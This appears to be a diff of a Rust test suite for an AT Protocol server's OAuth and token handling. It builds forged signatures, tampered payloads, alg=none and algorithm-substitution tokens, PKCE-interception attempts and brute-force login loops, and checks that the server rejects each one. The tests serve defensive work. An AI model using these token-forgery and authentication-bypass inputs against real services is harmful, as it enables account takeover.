("client_id", "https://example.com"),
1192
-
])
1193
-
.send()
1194
-
.await
1195
-
.unwrap();
1196
-
assert_eq!(
1197
-
res.status(),
1198
-
StatusCode::BAD_REQUEST,
1199
-
"Grant type '{}' should be rejected",
1200
-
grant_type
1201
-
);
1202
-
}
1203
-
}
1204
-
1205
-
#[tokio::test]
1206
-
async fn test_security_token_with_wrong_typ_rejected() {
1207
-
let url = base_url().await;
1208
-
let http_client = client();
1209
-
let wrong_types = vec!["JWT", "jwt", "at+JWT", "access_token", ""];
1210
-
for typ in wrong_types {
1211
-
let header = json!({
1212
-
"alg": "HS256",
1213
-
"typ": typ
1214
-
});
1215
-
let payload = json!({
1216
-
"iss": "https://test.pds",
1217
-
"sub": "did:plc:test",
1218
-
"aud": "https://test.pds",
1219
-
"iat": Utc::now().timestamp(),
1220
-
"exp": Utc::now().timestamp() + 3600,
1221
-
"jti": "wrong-typ-token"
1222
-
});
1223
-
let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap());
1224
-
let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap());
1225
-
let fake_sig = URL_SAFE_NO_PAD.encode(&[1u8; 32]);
1226
-
let token = format!("{}.{}.{}", header_b64, payload_b64, fake_sig);
1227
-
let res = http_client
1228
-
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
1229
-
.header("Authorization", format!("Bearer {}", token))
1230
-
.send()
1231
-
.await
1232
-
.unwrap();
1233
-
assert_eq!(
1234
-
res.status(),
1235
-
StatusCode::UNAUTHORIZED,
1236
-
"Token with typ='{}' should be rejected",
1237
-
typ
1238
-
);
1239
-
}
1240
-
}
1241
-
1242
-
#[tokio::test]
1243
-
async fn test_security_missing_required_claims_rejected() {
1244
-
let url = base_url().await;
1245
-
let http_client = client();
1246
-
let tokens_missing_claims = vec![
1247
-
(json!({"iss": "x", "sub": "x", "aud": "x", "iat": 0}), "exp"),
1248
-
(
1249
-
json!({"iss": "x", "sub": "x", "aud": "x", "exp": 9999999999i64}),
1250
-
"iat",
1251
-
),
1252
-
(
1253
-
json!({"iss": "x", "aud": "x", "iat": 0, "exp": 9999999999i64}),
1254
-
"sub",
1255
-
),
1256
-
];
1257
-
for (payload, missing_claim) in tokens_missing_claims {
1258
-
let header = json!({
1259
-
"alg": "HS256",
1260
-
"typ": "at+jwt"
1261
-
});
1262
-
let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap());
1263
-
let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap());
1264
-
let fake_sig = URL_SAFE_NO_PAD.encode(&[1u8; 32]);
1265
-
let token = format!("{}.{}.{}", header_b64, payload_b64, fake_sig);
1266
-
let res = http_client
1267
-
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
1268
-
.header("Authorization", format!("Bearer {}", token))
1269
-
.send()
1270
-
.await
1271
-
.unwrap();
1272
-
assert_eq!(
1273
-
res.status(),
1274
-
StatusCode::UNAUTHORIZED,
1275
-
"Token missing '{}' claim should be rejected",
1276
-
missing_claim
1277
-
);
1278
-
}
1279
-
}
1280
-
1281
-
#[tokio::test]
1282
-
async fn test_security_malformed_tokens_rejected() {
1283
-
let url = base_url().await;
1284
-
let http_client = client();
1285
-
let malformed_tokens = vec![
1286
-
"",
1287
-
"not-a-token",
1288
-
"one.two",
1289
-
"one.two.three.four",
1290
-
"....",
1291
-
"eyJhbGciOiJIUzI1NiJ9",
1292
-
"eyJhbGciOiJIUzI1NiJ9.",
1293
-
"eyJhbGciOiJIUzI1NiJ9..",
1294
-
".eyJzdWIiOiJ0ZXN0In0.",
1295
-
"!!invalid-base64!!.eyJzdWIiOiJ0ZXN0In0.sig",
1296
-
"eyJhbGciOiJIUzI1NiJ9.!!invalid!!.sig",
1297
-
];
1298
-
for token in malformed_tokens {
1299
-
let res = http_client
1300
-
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
1301
-
.header("Authorization", format!("Bearer {}", token))
1302
-
.send()
1303
-
.await
1304
-
.unwrap();
1305
-
assert_eq!(
1306
-
res.status(),
1307
-
StatusCode::UNAUTHORIZED,
1308
-
"Malformed token '{}' should be rejected",
1309
-
if token.len() > 50 {
1310
-
&token[..50]
1311
-
} else {
1312
-
token
1313
-
}
1314
-
);
1315
-
}
1316
-
}
1317
-
1318
-
#[tokio::test]
1319
-
async fn test_security_authorization_header_formats() {
1320
-
let url = base_url().await;
1321
-
let http_client = client();
1322
-
let (access_token, _, _) = get_oauth_tokens(&http_client, url).await;
1323
-
let valid_case_variants = vec![
1324
-
format!("bearer {}", access_token),
1325
-
format!("BEARER {}", access_token),
1326
-
format!("Bearer {}", access_token),
1327
-
];
1328
-
for auth_header in valid_case_variants {
1329
-
let res = http_client
1330
-
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
1331
-
.header("Authorization", &auth_header)
1332
-
.send()
1333
-
.await
1334
-
.unwrap();
1335
-
assert_eq!(
1336
-
res.status(),
1337
-
StatusCode::OK,
1338
-
"Auth header '{}...' should be accepted (RFC 7235 case-insensitivity)",
1339
-
if auth_header.len() > 30 {
1340
-
&auth_header[..30]
1341
-
} else {
1342
-
&auth_header
1343
-
}
1344
-
);
1345
-
}
1346
-
let invalid_formats = vec![
1347
-
format!("Basic {}", access_token),
1348
-
format!("Digest {}", access_token),
1349
-
access_token.clone(),
1350
-
format!("Bearer{}", access_token),
1351
-
];
1352
-
for auth_header in invalid_formats {
1353
-
let res = http_client
1354
-
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
1355
-
.header("Authorization", &auth_header)
1356
-
.send()
1357
-
.await
1358
-
.unwrap();
1359
-
assert_eq!(
1360
-
res.status(),
1361
-
StatusCode::UNAUTHORIZED,
1362
-
"Auth header '{}...' should be rejected",
1363
-
if auth_header.len() > 30 {
1364
-
&auth_header[..30]
1365
-
} else {
1366
-
&auth_header
1367
-
}
1368
-
);
1369
-
}
1370
-
}
1371
-
1372
-
#[tokio::test]
1373
-
async fn test_security_no_authorization_header() {
1374
-
let url = base_url().await;
1375
-
let http_client = client();
1376
-
let res = http_client
1377
-
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
1378
-
.send()
1379
-
.await
1380
-
.unwrap();
1381
-
assert_eq!(
1382
-
res.status(),
1383
-
StatusCode::UNAUTHORIZED,
1384
-
"Missing auth header should return 401"
1385
-
);
1386
-
}
1387
-
1388
-
#[tokio::test]
1389
-
async fn test_security_empty_authorization_header() {
1390
-
let url = base_url().await;
1391
-
let http_client = client();
1392
-
let res = http_client
1393
-
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
1394
-
.header("Authorization", "")
1395
-
.send()
1396
-
.await
1397
-
.unwrap();
1398
-
assert_eq!(
1399
-
res.status(),
1400
-
StatusCode::UNAUTHORIZED,
1401
-
"Empty auth header should return 401"
1402
-
);
1403
-
}
1404
-
1405
-
#[tokio::test]
1406
-
async fn test_security_revoked_token_rejected() {
1407
-
let url = base_url().await;
1408
-
let http_client = client();
1409
-
let (access_token, refresh_token, _) = get_oauth_tokens(&http_client, url).await;
1410
-
let revoke_res = http_client
1411
-
.post(format!("{}/oauth/revoke", url))
1412
-
.form(&[("token", &refresh_token)])
1413
-
.send()
1414
-
.await
1415
-
.unwrap();
1416
-
assert_eq!(revoke_res.status(), StatusCode::OK);
1417
-
let introspect_res = http_client
1418
-
.post(format!("{}/oauth/introspect", url))
1419
-
.form(&[("token", &access_token)])
1420
-
.send()
1421
-
.await
1422
-
.unwrap();
1423
-
let introspect_body: Value = introspect_res.json().await.unwrap();
1424
-
assert_eq!(
1425
-
introspect_body["active"], false,
1426
-
"Revoked token should be inactive"
1427
-
);
1428
-
}
1429
-
1430
-
#[tokio::test]
1431
-
#[ignore = "rate limiting is disabled in test environment"]
1432
-
async fn test_security_oauth_authorize_rate_limiting() {
1433
-
let url = base_url().await;
1434
-
let http_client = no_redirect_client();
1435
-
let ts = Utc::now().timestamp_nanos_opt().unwrap_or(0);
1436
-
let unique_ip = format!(
1437
-
"10.{}.{}.{}",
1438
-
(ts >> 16) & 0xFF,
1439
-
(ts >> 8) & 0xFF,
1440
-
ts & 0xFF
1441
-
);
1442
-
let redirect_uri = "https://example.com/rate-limit-callback";
1443
-
let mock_client = setup_mock_client_metadata(redirect_uri).await;
1444
-
let client_id = mock_client.uri();
1445
-
let (_, code_challenge) = generate_pkce();
1446
-
let client_for_par = client();
1447
-
let par_body: Value = client_for_par
1448
-
.post(format!("{}/oauth/par", url))
1449
-
.form(&[
1450
-
("response_type", "code"),
1451
-
("client_id", &client_id),
1452
-
("redirect_uri", redirect_uri),
1453
-
("code_challenge", &code_challenge),
1454
-
("code_challenge_method", "S256"),
1455
-
])
1456
-
.send()
1457
-
.await
1458
-
.unwrap()
1459
-
.json()
1460
-
.await
1461
-
.unwrap();
1462
-
let request_uri = par_body["request_uri"].as_str().unwrap();
1463
-
let mut rate_limited_count = 0;
1464
-
let mut other_count = 0;
1465
-
for _ in 0..15 {
1466
-
let res = http_client
1467
-
.post(format!("{}/oauth/authorize", url))
1468
-
.header("X-Forwarded-For", &unique_ip)
1469
-
.form(&[
1470
-
("request_uri", request_uri),
1471
-
("username", "nonexistent_user"),
1472
-
("password", "wrong_password"),
1473
-
("remember_device", "false"),
1474
-
])
1475
-
.send()
1476
-
.await
1477
-
.unwrap();
1478
-
match res.status() {
1479
-
StatusCode::TOO_MANY_REQUESTS => rate_limited_count += 1,
1480
-
_ => other_count += 1,
1481
-
}
1482
-
}
1483
-
assert!(
1484
-
rate_limited_count > 0,
1485
-
"Expected at least one rate-limited response after 15 OAuth authorize attempts. Got {} other and {} rate limited.",
1486
-
other_count,
1487
-
rate_limited_count
1488
-
);
1489
-
}
1490
-
1491
-
fn create_dpop_proof(
1492
-
method: &str,
1493
-
uri: &str,
1494
-
nonce: Option<&str>,
1495
-
ath: Option<&str>,
1496
-
iat_offset_secs: i64,
1497
-
) -> String {
1498
-
use p256::ecdsa::{Signature, SigningKey, signature::Signer};
1499
-
let signing_key = SigningKey::random(&mut rand::thread_rng());
1500
-
let verifying_key = signing_key.verifying_key();
1501
-
let point = verifying_key.to_encoded_point(false);
1502
let x = URL_SAFE_NO_PAD.encode(point.x().unwrap());
1503
let y = URL_SAFE_NO_PAD.encode(point.y().unwrap());
1504
-
let jwk = json!({
1505
-
"kty": "EC",
1506
-
"crv": "P-256",
1507
-
"x": x,
1508
-
"y": y
1509
-
});
1510
-
let header = json!({
1511
-
"typ": "dpop+jwt",
1512
-
"alg": "ES256",
1513
-
"jwk": jwk
1514
-
});
1515
-
let mut payload = json!({
1516
-
"jti": format!("unique-{}", Utc::now().timestamp_nanos_opt().unwrap_or(0)),
1517
-
"htm": method,
1518
-
"htu": uri,
1519
-
"iat": Utc::now().timestamp() + iat_offset_secs
1520
-
});
1521
-
if let Some(n) = nonce {
1522
-
payload["nonce"] = json!(n);
1523
-
}
1524
-
if let Some(a) = ath {
1525
-
payload["ath"] = json!(a);
1526
-
}
1527
let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap());
1528
let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap());
1529
let signing_input = format!("{}.{}", header_b64, payload_b64);
1530
let signature: Signature = signing_key.sign(signing_input.as_bytes());
1531
-
let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes());
1532
-
format!("{}.{}", signing_input, signature_b64)
1533
-
}
1534
-
1535
-
#[test]
1536
-
fn test_dpop_nonce_generation() {
1537
-
let secret = b"test-dpop-secret-32-bytes-long!!";
1538
-
let verifier = DPoPVerifier::new(secret);
1539
-
let nonce1 = verifier.generate_nonce();
1540
-
let nonce2 = verifier.generate_nonce();
1541
-
assert!(!nonce1.is_empty());
1542
-
assert!(!nonce2.is_empty());
1543
-
}
1544
-
1545
-
#[test]
1546
-
fn test_dpop_nonce_validation_success() {
1547
-
let secret = b"test-dpop-secret-32-bytes-long!!";
1548
-
let verifier = DPoPVerifier::new(secret);
1549
-
let nonce = verifier.generate_nonce();
1550
-
let result = verifier.validate_nonce(&nonce);
1551
-
assert!(result.is_ok(), "Valid nonce should pass: {:?}", result);
1552
-
}
1553
-
1554
-
#[test]
1555
-
fn test_dpop_nonce_wrong_secret() {
1556
-
let secret1 = b"test-dpop-secret-32-bytes-long!!";
1557
-
let secret2 = b"different-secret-32-bytes-long!!";
1558
-
let verifier1 = DPoPVerifier::new(secret1);
1559
-
let verifier2 = DPoPVerifier::new(secret2);
1560
-
let nonce = verifier1.generate_nonce();
1561
-
let result = verifier2.validate_nonce(&nonce);
1562
-
assert!(result.is_err(), "Nonce from different secret should fail");
1563
-
}
1564
-
1565
-
#[test]
1566
-
fn test_dpop_nonce_invalid_format() {
1567
-
let secret = b"test-dpop-secret-32-bytes-long!!";
1568
-
let verifier = DPoPVerifier::new(secret);
1569
-
assert!(verifier.validate_nonce("invalid").is_err());
1570
-
assert!(verifier.validate_nonce("").is_err());
1571
-
assert!(verifier.validate_nonce("!!!not-base64!!!").is_err());
1572
-
}
1573
-
1574
-
#[test]
1575
-
fn test_jwk_thumbprint_ec_p256() {
1576
-
let jwk = DPoPJwk {
1577
-
kty: "EC".to_string(),
1578
-
crv: Some("P-256".to_string()),
1579
-
x: Some("WbbXrPhtCg66wuF0NLhzXxF5PFzNZ7wNJm9M_1pCcXY".to_string()),
1580
-
y: Some("DubR6_2kU1H5EYhbcNpYZGy1EY6GEKKxv6PYx8VW0rA".to_string()),
1581
-
};
1582
-
let thumbprint = compute_jwk_thumbprint(&jwk);
1583
-
assert!(thumbprint.is_ok());
1584
-
let tp = thumbprint.unwrap();
1585
-
assert!(!tp.is_empty());
1586
-
assert!(
1587
-
tp.chars()
1588
-
.all(|c| c.is_alphanumeric() || c == '-' || c == '_')
1589
-
);
1590
-
}
1591
-
1592
-
#[test]
1593
-
fn test_jwk_thumbprint_ec_secp256k1() {
1594
-
let jwk = DPoPJwk {
1595
-
kty: "EC".to_string(),
1596
-
crv: Some("secp256k1".to_string()),
1597
-
x: Some("some_x_value".to_string()),
1598
-
y: Some("some_y_value".to_string()),
1599
-
};
1600
-
let thumbprint = compute_jwk_thumbprint(&jwk);
1601
-
assert!(thumbprint.is_ok());
1602
-
}
1603
-
1604
-
#[test]
1605
-
fn test_jwk_thumbprint_okp_ed25519() {
1606
-
let jwk = DPoPJwk {
1607
-
kty: "OKP".to_string(),
1608
-
crv: Some("Ed25519".to_string()),
1609
-
x: Some("some_x_value".to_string()),
1610
-
y: None,
1611
-
};
1612
-
let thumbprint = compute_jwk_thumbprint(&jwk);
1613
-
assert!(thumbprint.is_ok());
1614
-
}
1615
-
1616
-
#[test]
1617
-
fn test_jwk_thumbprint_missing_crv() {
1618
-
let jwk = DPoPJwk {
1619
-
kty: "EC".to_string(),
1620
-
crv: None,
1621
-
x: Some("x".to_string()),
1622
-
y: Some("y".to_string()),
1623
-
};
1624
-
let thumbprint = compute_jwk_thumbprint(&jwk);
1625
-
assert!(thumbprint.is_err());
1626
-
}
1627
-
1628
-
#[test]
1629
-
fn test_jwk_thumbprint_missing_x() {
1630
-
let jwk = DPoPJwk {
1631
-
kty: "EC".to_string(),
1632
-
crv: Some("P-256".to_string()),
1633
-
x: None,
1634
-
y: Some("y".to_string()),
1635
-
};
1636
-
let thumbprint = compute_jwk_thumbprint(&jwk);
1637
-
assert!(thumbprint.is_err());
1638
-
}
1639
-
1640
-
#[test]
1641
-
fn test_jwk_thumbprint_missing_y_for_ec() {
1642
-
let jwk = DPoPJwk {
1643
-
kty: "EC".to_string(),
1644
-
crv: Some("P-256".to_string()),
1645
-
x: Some("x".to_string()),
1646
-
y: None,
1647
-
};
1648
-
let thumbprint = compute_jwk_thumbprint(&jwk);
1649
-
assert!(thumbprint.is_err());
1650
-
}
1651
-
1652
-
#[test]
1653
-
fn test_jwk_thumbprint_unsupported_key_type() {
1654
-
let jwk = DPoPJwk {
1655
-
kty: "RSA".to_string(),
1656
-
crv: None,
1657
-
x: None,
1658
-
y: None,
1659
-
};
1660
-
let thumbprint = compute_jwk_thumbprint(&jwk);
1661
-
assert!(thumbprint.is_err());
1662
-
}
1663
-
1664
-
#[test]
1665
-
fn test_jwk_thumbprint_deterministic() {
1666
-
let jwk = DPoPJwk {
1667
-
kty: "EC".to_string(),
1668
-
crv: Some("P-256".to_string()),
1669
-
x: Some("WbbXrPhtCg66wuF0NLhzXxF5PFzNZ7wNJm9M_1pCcXY".to_string()),
1670
-
y: Some("DubR6_2kU1H5EYhbcNpYZGy1EY6GEKKxv6PYx8VW0rA".to_string()),
1671
-
};
1672
-
let tp1 = compute_jwk_thumbprint(&jwk).unwrap();
1673
-
let tp2 = compute_jwk_thumbprint(&jwk).unwrap();
1674
-
assert_eq!(tp1, tp2, "Thumbprint should be deterministic");
1675
-
}
1676
-
1677
-
#[test]
1678
-
fn test_dpop_proof_invalid_format() {
1679
-
let secret = b"test-dpop-secret-32-bytes-long!!";
1680
-
let verifier = DPoPVerifier::new(secret);
1681
-
let result = verifier.verify_proof("not.enough.parts", "POST", "https://example.com", None);
1682
-
assert!(result.is_err());
1683
-
let result = verifier.verify_proof("invalid", "POST", "https://example.com", None);
1684
-
assert!(result.is_err());
1685
-
}
1686
-
1687
-
#[test]
1688
-
fn test_dpop_proof_invalid_typ() {
1689
-
let secret = b"test-dpop-secret-32-bytes-long!!";
1690
-
let verifier = DPoPVerifier::new(secret);
1691
-
let header = json!({
1692
-
"typ": "JWT",
1693
-
"alg": "ES256",
1694
-
"jwk": {
1695
-
"kty": "EC",
1696
-
"crv": "P-256",
1697
-
"x": "x",
1698
-
"y": "y"
1699
-
}
1700
-
});
1701
-
let payload = json!({
1702
-
"jti": "unique",
1703
-
"htm": "POST",
1704
-
"htu": "https://example.com",
1705
-
"iat": Utc::now().timestamp()
1706
-
});
1707
-
let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap());
1708
-
let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap());
1709
-
let proof = format!("{}.{}.sig", header_b64, payload_b64);
1710
-
let result = verifier.verify_proof(&proof, "POST", "https://example.com", None);
1711
-
assert!(result.is_err());
1712
-
}
1713
-
1714
-
#[test]
1715
-
fn test_dpop_proof_method_mismatch() {
1716
-
let secret = b"test-dpop-secret-32-bytes-long!!";
1717
-
let verifier = DPoPVerifier::new(secret);
1718
-
let proof = create_dpop_proof("POST", "https://example.com/token", None, None, 0);
1719
-
let result = verifier.verify_proof(&proof, "GET", "https://example.com/token", None);
1720
-
assert!(result.is_err());
1721
-
}
1722
-
1723
-
#[test]
1724
-
fn test_dpop_proof_uri_mismatch() {
1725
-
let secret = b"test-dpop-secret-32-bytes-long!!";
1726
-
let verifier = DPoPVerifier::new(secret);
1727
-
let proof = create_dpop_proof("POST", "https://example.com/token", None, None, 0);
1728
-
let result = verifier.verify_proof(&proof, "POST", "https://other.com/token", None);
1729
-
assert!(result.is_err());
1730
-
}
1731
-
1732
-
#[test]
1733
-
fn test_dpop_proof_iat_too_old() {
1734
-
let secret = b"test-dpop-secret-32-bytes-long!!";
1735
-
let verifier = DPoPVerifier::new(secret);
1736
-
let proof = create_dpop_proof("POST", "https://example.com/token", None, None, -600);
1737
-
let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None);
1738
-
assert!(result.is_err());
1739
-
}
1740
-
1741
-
#[test]
1742
-
fn test_dpop_proof_iat_future() {
1743
-
let secret = b"test-dpop-secret-32-bytes-long!!";
1744
-
let verifier = DPoPVerifier::new(secret);
1745
-
let proof = create_dpop_proof("POST", "https://example.com/token", None, None, 600);
1746
-
let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None);
1747
-
assert!(result.is_err());
1748
-
}
1749
-
1750
-
#[test]
1751
-
fn test_dpop_proof_ath_mismatch() {
1752
-
let secret = b"test-dpop-secret-32-bytes-long!!";
1753
-
let verifier = DPoPVerifier::new(secret);
1754
-
let proof = create_dpop_proof(
1755
-
"GET",
1756
-
"https://example.com/resource",
1757
-
None,
1758
-
Some("wrong_hash"),
1759
-
0,
1760
-
);
1761
-
let result = verifier.verify_proof(
1762
-
&proof,
1763
-
"GET",
1764
-
"https://example.com/resource",
1765
-
Some("correct_hash"),
1766
-
);
1767
-
assert!(result.is_err());
1768
-
}
1769
-
1770
-
#[test]
1771
-
fn test_dpop_proof_missing_ath_when_required() {
1772
-
let secret = b"test-dpop-secret-32-bytes-long!!";
1773
-
let verifier = DPoPVerifier::new(secret);
1774
-
let proof = create_dpop_proof("GET", "https://example.com/resource", None, None, 0);
1775
-
let result = verifier.verify_proof(
1776
-
&proof,
1777
-
"GET",
1778
-
"https://example.com/resource",
1779
-
Some("expected_hash"),
1780
-
);
1781
-
assert!(result.is_err());
1782
-
}
1783
-
1784
-
#[test]
1785
-
fn test_dpop_proof_uri_ignores_query_params() {
1786
-
let secret = b"test-dpop-secret-32-bytes-long!!";
1787
-
let verifier = DPoPVerifier::new(secret);
1788
-
let proof = create_dpop_proof("POST", "https://example.com/token", None, None, 0);
1789
-
let result = verifier.verify_proof(&proof, "POST", "https://example.com/token?foo=bar", None);
1790
-
assert!(
1791
-
result.is_ok(),
1792
-
"Query params should be ignored: {:?}",
1793
-
result
1794
-
);
1795
}
···
1
#![allow(unused_imports)]
2
mod common;
3
mod helpers;
4
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
···
13
use wiremock::{Mock, MockServer, ResponseTemplate};
14
15
fn no_redirect_client() -> reqwest::Client {
16
+
reqwest::Client::builder().redirect(redirect::Policy::none()).build().unwrap()
17
}
18
19
fn generate_pkce() -> (String, String) {
···
21
let code_verifier = URL_SAFE_NO_PAD.encode(verifier_bytes);
22
let mut hasher = Sha256::new();
23
hasher.update(code_verifier.as_bytes());
24
+
let code_challenge = URL_SAFE_NO_PAD.encode(&hasher.finalize());
25
(code_verifier, code_challenge)
26
}
27
28
async fn setup_mock_client_metadata(redirect_uri: &str) -> MockServer {
29
let mock_server = MockServer::start().await;
30
let metadata = json!({
31
+
"client_id": mock_server.uri(),
32
"client_name": "Security Test Client",
33
"redirect_uris": [redirect_uri],
34
"grant_types": ["authorization_code", "refresh_token"],
···
36
"token_endpoint_auth_method": "none",
37
"dpop_bound_access_tokens": false
38
});
39
+
Mock::given(method("GET")).and(path("/"))
40
.respond_with(ResponseTemplate::new(200).set_body_json(metadata))
41
+
.mount(&mock_server).await;
42
mock_server
43
}
44
45
async fn get_oauth_tokens(http_client: &reqwest::Client, url: &str) -> (String, String, String) {
46
let ts = Utc::now().timestamp_millis();
47
let handle = format!("sec-test-{}", ts);
48
+
http_client.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
49
+
.json(&json!({ "handle": handle, "email": format!("{}@example.com", handle), "password": "security-test-password" }))
50
+
.send().await.unwrap();
51
let redirect_uri = "https://example.com/sec-callback";
52
let mock_client = setup_mock_client_metadata(redirect_uri).await;
53
let client_id = mock_client.uri();
54
let (code_verifier, code_challenge) = generate_pkce();
55
+
let par_body: Value = http_client.post(format!("{}/oauth/par", url))
56
+
.form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri),
57
+
("code_challenge", &code_challenge), ("code_challenge_method", "S256")])
58
+
.send().await.unwrap().json().await.unwrap();
59
let request_uri = par_body["request_uri"].as_str().unwrap();
60
let auth_client = no_redirect_client();
61
+
let auth_res = auth_client.post(format!("{}/oauth/authorize", url))
62
+
.form(&[("request_uri", request_uri), ("username", &handle), ("password", "security-test-password"), ("remember_device", "false")])
63
+
.send().await.unwrap();
64
+
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
65
+
let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap();
66
+
let token_body: Value = http_client.post(format!("{}/oauth/token", url))
67
+
.form(&[("grant_type", "authorization_code"), ("code", code), ("redirect_uri", redirect_uri),
68
+
("code_verifier", &code_verifier), ("client_id", &client_id)])
69
+
.send().await.unwrap().json().await.unwrap();
70
+
(token_body["access_token"].as_str().unwrap().to_string(),
71
+
token_body["refresh_token"].as_str().unwrap().to_string(), client_id)
72
}
73
74
#[tokio::test]
75
+
async fn test_token_tampering_attacks() {
76
let url = base_url().await;
77
let http_client = client();
78
let (access_token, _, _) = get_oauth_tokens(&http_client, url).await;
79
let parts: Vec<&str> = access_token.split('.').collect();
80
+
assert_eq!(parts.len(), 3);
81
+
let forged_sig = URL_SAFE_NO_PAD.encode(&[0u8; 32]);
82
+
let forged_token = format!("{}.{}.{}", parts[0], parts[1], forged_sig);
83
+
assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
84
+
.bearer_auth(&forged_token).send().await.unwrap().status(), StatusCode::UNAUTHORIZED, "Forged signature should be rejected");
85
let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).unwrap();
86
let mut payload: Value = serde_json::from_slice(&payload_bytes).unwrap();
87
payload["sub"] = json!("did:plc:attacker");
88
let modified_payload = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap());
89
let modified_token = format!("{}.{}.{}", parts[0], modified_payload, parts[2]);
90
+
assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
91
+
.bearer_auth(&modified_token).send().await.unwrap().status(), StatusCode::UNAUTHORIZED, "Modified payload should be rejected");
92
+
let none_header = json!({ "alg": "none", "typ": "at+jwt" });
93
+
let none_payload = json!({ "iss": "https://test.pds", "sub": "did:plc:attacker", "aud": "https://test.pds",
94
+
"iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, "jti": "fake", "scope": "atproto" });
95
+
let none_token = format!("{}.{}.", URL_SAFE_NO_PAD.encode(serde_json::to_string(&none_header).unwrap()),
96
+
URL_SAFE_NO_PAD.encode(serde_json::to_string(&none_payload).unwrap()));
97
+
assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
98
+
.bearer_auth(&none_token).send().await.unwrap().status(), StatusCode::UNAUTHORIZED, "alg=none should be rejected");
99
+
let rs256_header = json!({ "alg": "RS256", "typ": "at+jwt" });
100
+
let rs256_token = format!("{}.{}.{}", URL_SAFE_NO_PAD.encode(serde_json::to_string(&rs256_header).unwrap()),
101
+
URL_SAFE_NO_PAD.encode(serde_json::to_string(&none_payload).unwrap()), URL_SAFE_NO_PAD.encode(&[1u8; 64]));
102
+
assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
103
+
.bearer_auth(&rs256_token).send().await.unwrap().status(), StatusCode::UNAUTHORIZED, "Algorithm substitution should be rejected");
104
+
let expired_payload = json!({ "iss": "https://test.pds", "sub": "did:plc:test", "aud": "https://test.pds",
105
+
"iat": Utc::now().timestamp() - 7200, "exp": Utc::now().timestamp() - 3600, "jti": "expired" });
106
+
let expired_token = format!("{}.{}.{}", URL_SAFE_NO_PAD.encode(serde_json::to_string(&json!({"alg":"HS256","typ":"at+jwt"})).unwrap()),
107
+
URL_SAFE_NO_PAD.encode(serde_json::to_string(&expired_payload).unwrap()), URL_SAFE_NO_PAD.encode(&[1u8; 32]));
108
+
assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
109
+
.bearer_auth(&expired_token).send().await.unwrap().status(), StatusCode::UNAUTHORIZED, "Expired token should be rejected");
110
}
111
112
#[tokio::test]
113
+
async fn test_pkce_security() {
114
let url = base_url().await;
115
let http_client = client();
116
+
let redirect_uri = "https://example.com/pkce-callback";
117
let mock_client = setup_mock_client_metadata(redirect_uri).await;
118
let client_id = mock_client.uri();
119
+
let res = http_client.post(format!("{}/oauth/par", url))
120
+
.form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri),
121
+
("code_challenge", "plain-text-challenge"), ("code_challenge_method", "plain")])
122
+
.send().await.unwrap();
123
+
assert_eq!(res.status(), StatusCode::BAD_REQUEST, "PKCE plain method should be rejected");
124
let body: Value = res.json().await.unwrap();
125
+
assert!(body["error_description"].as_str().unwrap().to_lowercase().contains("s256"));
126
+
let res = http_client.post(format!("{}/oauth/par", url))
127
+
.form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri)])
128
+
.send().await.unwrap();
129
+
assert_eq!(res.status(), StatusCode::BAD_REQUEST, "Missing PKCE challenge should be rejected");
130
let ts = Utc::now().timestamp_millis();
131
let handle = format!("pkce-attack-{}", ts);
132
+
http_client.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
133
+
.json(&json!({ "handle": handle, "email": format!("{}@example.com", handle), "password": "pkce-password" }))
134
+
.send().await.unwrap();
135
let (_, code_challenge) = generate_pkce();
136
let (attacker_verifier, _) = generate_pkce();
137
+
let par_body: Value = http_client.post(format!("{}/oauth/par", url))
138
+
.form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri),
139
+
("code_challenge", &code_challenge), ("code_challenge_method", "S256")])
140
+
.send().await.unwrap().json().await.unwrap();
141
let request_uri = par_body["request_uri"].as_str().unwrap();
142
let auth_client = no_redirect_client();
143
+
let auth_res = auth_client.post(format!("{}/oauth/authorize", url))
144
+
.form(&[("request_uri", request_uri), ("username", &handle), ("password", "pkce-password"), ("remember_device", "false")])
145
+
.send().await.unwrap();
146
+
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
147
+
let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap();
148
+
let token_res = http_client.post(format!("{}/oauth/token", url))
149
+
.form(&[("grant_type", "authorization_code"), ("code", code), ("redirect_uri", redirect_uri),
150
+
("code_verifier", &attacker_verifier), ("client_id", &client_id)])
151
+
.send().await.unwrap();
152
+
